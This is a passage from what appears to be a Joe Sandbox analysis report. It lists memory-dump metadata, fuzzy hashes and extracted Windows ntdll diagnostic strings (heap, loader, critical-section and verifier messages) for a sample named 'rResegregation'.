                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                  • String ID:
                                                                  • API String ID: 190613189-0
                                                                  • Opcode ID: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                                                  • Instruction ID: 7adaab352aa717b916c044831a99f4991ef712c09a2c9b56ba9fed1a583d178e
                                                                  • Opcode Fuzzy Hash: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                                                  • Instruction Fuzzy Hash: 43F09636505518FFC7129FA5DC0099EBBB8EF16360B2540B9F801F7360D674EE019BA9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Execution Graph

                                                                  Execution Coverage:0%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:19.5%
                                                                  Total number of Nodes:118
                                                                  Total number of Limit Nodes:1

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 6 377f34e0-377f34ec LdrInitializeThunk
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 317ca65dc5e93b657e3d53c6ca43abec9954ee7935d08f244430100c1374e51a
                                                                  • Instruction ID: 38cb2c2994cb3d825ed68285cc656f1cc152be7732087a4397f080cdcfa60b0a
                                                                  • Opcode Fuzzy Hash: 317ca65dc5e93b657e3d53c6ca43abec9954ee7935d08f244430100c1374e51a
                                                                  • Instruction Fuzzy Hash: 2890027160550422D50061584A14706100547E0301F61CC16A0414568EC7A5899979A2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 5 377f2d10-377f2d1c LdrInitializeThunk
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 3503a85cc39b5c394de84c87f1ec6725fe36a8ddeb87a7793a08f73f46957011
                                                                  • Instruction ID: 578184eaf369905027431e6678e3754d00ca99858743911aa1de80af3a631c94
                                                                  • Opcode Fuzzy Hash: 3503a85cc39b5c394de84c87f1ec6725fe36a8ddeb87a7793a08f73f46957011
                                                                  • Instruction Fuzzy Hash: 4F90027120140433D51161584A04707000947E0341F91CC17A0414558ED666899AB521
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 4 377f2b90-377f2b9c LdrInitializeThunk
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 81c4847d3947d2b1866a0eb7313f22dacd40ab5434bbbc129e218148e545a27c
                                                                  • Instruction ID: 13dbc790182ef7e4286910071db445026c0a55bf8d90e8bba8ff810736786f60
                                                                  • Opcode Fuzzy Hash: 81c4847d3947d2b1866a0eb7313f22dacd40ab5434bbbc129e218148e545a27c
                                                                  • Instruction Fuzzy Hash: 4D90027120148822D5106158890474A000547E0301F55CC16A4414658EC6A588D97521
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 0 377f2b2a-377f2b2f 1 377f2b3f-377f2b46 LdrInitializeThunk 0->1 2 377f2b31-377f2b38 0->2
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: b814a1c9bf028ac1cb15b3294388412fbaea6cbe3b89b44247b9bc81d390a678
                                                                  • Instruction ID: fc052c57c05a69f59caed12307002300c2fee68b79577915f12e69ca0cdc40a9
                                                                  • Opcode Fuzzy Hash: b814a1c9bf028ac1cb15b3294388412fbaea6cbe3b89b44247b9bc81d390a678
                                                                  • Instruction Fuzzy Hash: DFB09B719054C5D5E601D7604B0870B790167D1751F15C856D1460691F4739C4D5F575
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  Strings
                                                                  • Critical section debug info address, xrefs: 3782522A, 37825339
                                                                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 37825215, 378252A1, 37825324
                                                                  • Thread is in a state in which it cannot own a critical section, xrefs: 3782534E
                                                                  • double initialized or corrupted critical section, xrefs: 37825313
                                                                  • undeleted critical section in freed memory, xrefs: 37825236
                                                                  • Thread identifier, xrefs: 37825345
                                                                  • Invalid debug info address of this critical section, xrefs: 378252C1
                                                                  • Critical section address., xrefs: 3782530D
                                                                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 378252ED
                                                                  • 8, xrefs: 378250EE
                                                                  • Address of the debug info found in the active list., xrefs: 378252B9, 37825305
                                                                  • corrupted critical section, xrefs: 378252CD
                                                                  • Critical section address, xrefs: 37825230, 378252C7, 3782533F
                                                                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 378252D9
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                  • API String ID: 0-2368682639
                                                                  • Opcode ID: cc803e7e17ceae554c5b13989ba4a3abc6df401f6b2e2dc38d07662dbeb3b10f
                                                                  • Instruction ID: 988c2c608ce19e7402123282b5f841daba01b219b3843b9927322c1c53ce1823
                                                                  • Opcode Fuzzy Hash: cc803e7e17ceae554c5b13989ba4a3abc6df401f6b2e2dc38d07662dbeb3b10f
                                                                  • Instruction Fuzzy Hash: F1818DB1A42348AFEB10CF95C844BEEBBB9FF09710F2041A9F904BB680D775A945DB51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                  • API String ID: 3446177414-1700792311
                                                                  • Opcode ID: 54fa69bc7aa3365be34a7976c7cda9e3086f2fae01f50b3646bb383eb6f91c43
                                                                  • Instruction ID: 1d7341940a3705a11ece7d523e0d87e5695ec399caffcc10ea36fa1f6555d41d
                                                                  • Opcode Fuzzy Hash: 54fa69bc7aa3365be34a7976c7cda9e3086f2fae01f50b3646bb383eb6f91c43
                                                                  • Instruction Fuzzy Hash: 46D10275500689EFDB42CFA8C408FA9BBF2FF59324F048159E544AB762CB39A941CF16
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$h.}7
                                                                  • API String ID: 0-2089972516
                                                                  • Opcode ID: cb51fbb681e6e8cc432646804e91d4eb204f4426ab638cd2dd47eeee4851126f
                                                                  • Instruction ID: ee5f8d82a13fd23081f6f6998bdcf2387d913bc423b55c21898b2eda05687e4c
                                                                  • Opcode Fuzzy Hash: cb51fbb681e6e8cc432646804e91d4eb204f4426ab638cd2dd47eeee4851126f
                                                                  • Instruction Fuzzy Hash: 64B17EB5908341AFE751CF24C884B5FB7E8AB88754F414A2EF894EB344D774D9488B93
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                  • API String ID: 0-2515994595
                                                                  • Opcode ID: 75d4e8cbbd0f85865624085d400d35b76c02c153af04bbed24e5015d898521f4
                                                                  • Instruction ID: 6bd7bfa3a869a5819513dbde1759059d9747f59a038963638ef2e3ee427bdefa
                                                                  • Opcode Fuzzy Hash: 75d4e8cbbd0f85865624085d400d35b76c02c153af04bbed24e5015d898521f4
                                                                  • Instruction Fuzzy Hash: 9851C0B5504318ABD321CF18CC84BABB7E8EB943A0F404D1EF9A987241E734D644DBD2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • RtlDebugPrintTimes.NTDLL ref: 377A651C
                                                                    • Part of subcall function 377A6565: RtlDebugPrintTimes.NTDLL ref: 377A6614
                                                                    • Part of subcall function 377A6565: RtlDebugPrintTimes.NTDLL ref: 377A665F
                                                                  Strings
                                                                  • apphelp.dll, xrefs: 377A6446
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 378097A0, 378097C9
                                                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 37809790
                                                                  • LdrpInitShimEngine, xrefs: 37809783, 37809796, 378097BF
                                                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 378097B9
                                                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 3780977C
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 3446177414-204845295
                                                                  • Opcode ID: 33401ecd5b6f01cb4d8230c24c1485827afd6d86773026f708a689be4764caeb
                                                                  • Instruction ID: a2104451ab64f5f78618c62ed1aea07e75d63d8559c05784956bdea934dd598e
                                                                  • Opcode Fuzzy Hash: 33401ecd5b6f01cb4d8230c24c1485827afd6d86773026f708a689be4764caeb
                                                                  • Instruction Fuzzy Hash: 3C51C071249304AFE360DF24DC89BAB7BE8EB84754F400929F5949B650DB34E905CF93
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • RtlDebugPrintTimes.NTDLL ref: 377DD879
                                                                    • Part of subcall function 377B4779: RtlDebugPrintTimes.NTDLL ref: 377B4817
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 3446177414-1975516107
                                                                  • Opcode ID: 5b1b19b91710310258630636bb97ea98f4e20f7104b1e259b867cf789005bb4e
                                                                  • Instruction ID: c9a6df6d6316346f0facc72afb66aa37887c4a605ae62cead69a434059c706f0
                                                                  • Opcode Fuzzy Hash: 5b1b19b91710310258630636bb97ea98f4e20f7104b1e259b867cf789005bb4e
                                                                  • Instruction Fuzzy Hash: 2651F175A45346DFEB45CFA4C48979DBBF2BF48324F6040AAC4007F281D778A986CB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                                                                  • API String ID: 0-2224505338
                                                                  • Opcode ID: ce4da1bc0ab9b3800921046138404a6791d6fb35702414527ef22e1dd5fb1bdb
                                                                  • Instruction ID: 03dd5b541a65f9ddb1191c145058edca5299da1862adb8b53f2e884a105ec604
                                                                  • Opcode Fuzzy Hash: ce4da1bc0ab9b3800921046138404a6791d6fb35702414527ef22e1dd5fb1bdb
                                                                  • Instruction Fuzzy Hash: 6751E27A151288EFE781CF54D888F6AB7E4EF047B4F108599F4019F221CB39EA50CE12
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  • VerifierDebug, xrefs: 37838925
                                                                  • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 378386BD
                                                                  • VerifierFlags, xrefs: 378388D0
                                                                  • HandleTraces, xrefs: 3783890F
                                                                  • VerifierDlls, xrefs: 3783893D
                                                                  • AVRF: -*- final list of providers -*- , xrefs: 3783880F
                                                                  • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 378386E7
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                  • API String ID: 0-3223716464
                                                                  • Opcode ID: 6a22bf88ee5d33f4780654a4bde2337693cfb3640dbf3059929b3ffae7ac88b4
                                                                  • Instruction ID: 7c326476fc77876336ba23f96e437a61ee95993de20bf3a279747faca7a51c1f
                                                                  • Opcode Fuzzy Hash: 6a22bf88ee5d33f4780654a4bde2337693cfb3640dbf3059929b3ffae7ac88b4
                                                                  • Instruction Fuzzy Hash: CE91227A647311AFF311CF2CC880B5A7BA9AB64714F450968F850AF241C738E845DBE2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 3781A7AF
                                                                  • LdrpDynamicShimModule, xrefs: 3781A7A5
                                                                  • DGx7, xrefs: 377D2382
                                                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 3781A79F
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: DGx7$Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 0-3766782692
                                                                  • Opcode ID: f13d25125dba51a6b559b0c8dd4c549a531b24293f8614c2c4d1d8cc8e8bf33e
                                                                  • Instruction ID: 37d2c9ec2155b06332bb63867344f9c86de7099214c6f18a2966f2399fd8f63c
                                                                  • Opcode Fuzzy Hash: f13d25125dba51a6b559b0c8dd4c549a531b24293f8614c2c4d1d8cc8e8bf33e
                                                                  • Instruction Fuzzy Hash: E2313975A41300EFE7909F58C8C5BAD7BB5EB94750F140069E811BB650DBB89943CB92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                  • API String ID: 0-523794902
                                                                  • Opcode ID: 40619a10b934848061141316aeaac99054d68634845af5e9a98b61e1a6b22caf
                                                                  • Instruction ID: 8061f211e54594ca986b56f6a9923317cde8032d24351bb18d340e64a8cc2da6
                                                                  • Opcode Fuzzy Hash: 40619a10b934848061141316aeaac99054d68634845af5e9a98b61e1a6b22caf
                                                                  • Instruction Fuzzy Hash: 9942DF75205341EFE345CF28C888B2ABBE5FF98358F044A69E8959B351DB34E942CF52
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs$h.}7
                                                                  • API String ID: 0-2755375954
                                                                  • Opcode ID: b1ec63d1378b13884b86eca734943594874acb3147539880dd6a3c2e2b07ef05
                                                                  • Instruction ID: fca3f190e041fa56e88c3a5b20d6a105481482edc801c724a2dfaf7d263f39b2
                                                                  • Opcode Fuzzy Hash: b1ec63d1378b13884b86eca734943594874acb3147539880dd6a3c2e2b07ef05
                                                                  • Instruction Fuzzy Hash: 0CF15EB6D01219EFDB01CF99C984ADEBBB9FF09790F50406AE505EB210EB759E01CB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 0-792281065
                                                                  • Opcode ID: 381a6584c99ebf9f77ae4b700082e59c339947beef2388a6d7cfc586f4a56a74
                                                                  • Instruction ID: 483d450222eb95ce898bd47446feb76e2bdc489029fb631b98947cecf8cf7af4
                                                                  • Opcode Fuzzy Hash: 381a6584c99ebf9f77ae4b700082e59c339947beef2388a6d7cfc586f4a56a74
                                                                  • Instruction Fuzzy Hash: 32915A74A03314DFEB64CF18D849BAD7BB5EF15765F000129E914BFA80DB785882DB92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 377EC5E3
                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 37827F8C, 37828000
                                                                  • Loading import redirection DLL: '%wZ', xrefs: 37827F7B
                                                                  • LdrpInitializeProcess, xrefs: 377EC5E4
                                                                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 37827FF0
                                                                  • LdrpInitializeImportRedirection, xrefs: 37827F82, 37827FF6
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                  • API String ID: 0-475462383
                                                                  • Opcode ID: aa3a8983851756571c8a5e5cf6f0c728fff78d79a8c036bb5922a0563d5b054b
                                                                  • Instruction ID: 48826563acfbdcd746dae83538af14ef62adb9e2198479a8399dbd5feafbd840
                                                                  • Opcode Fuzzy Hash: aa3a8983851756571c8a5e5cf6f0c728fff78d79a8c036bb5922a0563d5b054b
                                                                  • Instruction Fuzzy Hash: 6231E375605341AFD314DF28D949E2ABBE9EF99720F010568F984AF391E724EC05CBA3
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 37821FA9
                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 37821F82
                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 37821FC9
                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 37821F8A
                                                                  • SXS: %s() passed the empty activation context, xrefs: 37821F6F
                                                                  • RtlGetAssemblyStorageRoot, xrefs: 37821F6A, 37821FA4, 37821FC4
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                  • API String ID: 0-861424205
                                                                  • Opcode ID: 0ff763b112def1e535e69d5998ac27414e81caa246e923c57f831eca3855e23b
                                                                  • Instruction ID: b3854fc77e780fb38eda074c00fc76f8f5ad5331eb597fd6b0d8f66fff0dfd49
                                                                  • Opcode Fuzzy Hash: 0ff763b112def1e535e69d5998ac27414e81caa246e923c57f831eca3855e23b
                                                                  • Instruction Fuzzy Hash: 1B310676E012147FF7108A8A9C44FAB766CEF55754F1145A9FA106B644C770EA408BE2
                                                                  Uniqueness

